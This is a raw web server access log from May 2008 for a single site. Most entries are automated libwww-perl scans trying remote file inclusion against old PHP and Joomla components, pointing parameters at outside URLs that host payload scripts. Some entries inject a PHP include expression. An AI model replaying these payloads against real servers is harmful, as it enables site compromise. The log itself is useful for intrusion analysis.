207.58.181.74 - - [28/May/2008:11:39:13 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:39:37 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:39:37 -0700] "GET /modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:39:37 -0700] "GET /logs/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:39:43 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:39:44 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:39:44 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:39:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:39:57 -0700] "GET /logs/access_080118.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:40:01 -0700] "GET /logs/index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:40:03 -0700] "GET /index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:40:06 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.29.160 - - [28/May/2008:11:40:07 -0700] "GET /retreat1/?M=D HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:40:15 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.129.197.54 - - [28/May/2008:11:40:21 -0700] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.197.54 - - [28/May/2008:11:40:21 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.197.54 - - [28/May/2008:11:40:21 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:11:40:33 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:11:40:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:11:40:34 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.16.254.7 - - [28/May/2008:11:40:39 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:40:46 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:40:48 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:40:48 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:41:06 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:41:29 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:41:29 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:41:29 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:41:31 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.129.197.54 - - [28/May/2008:11:41:33 -0700] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:41:34 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:41:34 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:41:40 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:41:40 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:41:42 -0700] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:41:47 -0700] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:41:48 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:41:48 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:41:55 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.176.172 - - [28/May/2008:11:42:09 -0700] "GET /logs//index1.php?dat=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.172 - - [28/May/2008:11:42:09 -0700] "GET //index1.php?dat=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.129.197.54 - - [28/May/2008:11:42:14 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:42:15 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:42:15 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:42:21 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:42:24 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:42:34 -0700] "GET /logs/access_080218.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:42:34 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:42:34 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:42:37 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:42:45 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:42:45 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:42:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:43:06 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:43:11 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:43:14 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:43:16 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:43:20 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:43:25 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:43:25 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:43:26 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:43:30 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:43:30 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:43:31 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:43:43 -0700] "GET /logs/access_080302.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:43:54 -0700] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:43:54 -0700] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:44:04 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.48.105.13 - - [28/May/2008:11:44:10 -0700] "GET /logs/access_080315.log//playlist.php/db.php?commonpath=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.48.105.13 - - [28/May/2008:11:44:11 -0700] "GET //playlist.php/db.php?commonpath=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.48.105.13 - - [28/May/2008:11:44:11 -0700] "GET /logs//playlist.php/db.php?commonpath=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:44:16 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:44:22 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:44:26 -0700] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:44:26 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:44:26 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.21.59 - - [28/May/2008:11:44:39 -0700] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:44:46 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:44:55 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.197.54 - - [28/May/2008:11:45:09 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.197.54 - - [28/May/2008:11:45:09 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.36.247 - - [28/May/2008:11:45:27 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:45:28 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:45:46 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:45:49 -0700] "GET /logs/access_080327.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:45:50 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:45:54 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.150.97 - - [28/May/2008:11:45:56 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:11:46:05 -0700] "GET /logs/access_080117.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:46:08 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:46:08 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:46:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:46:09 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.252 - - [28/May/2008:11:46:10 -0700] "GET /blog/ HTTP/1.0" 200 11591 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
64.180.134.223 - - [28/May/2008:11:46:12 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:46:16 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [28/May/2008:11:46:41 -0700] "GET /logs/index2.php?p=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [28/May/2008:11:46:42 -0700] "GET /index2.php?p=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.59.227.15 - - [28/May/2008:11:47:18 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=833//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/machinekill/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.59.227.15 - - [28/May/2008:11:47:20 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=833//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/machinekill/safe.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
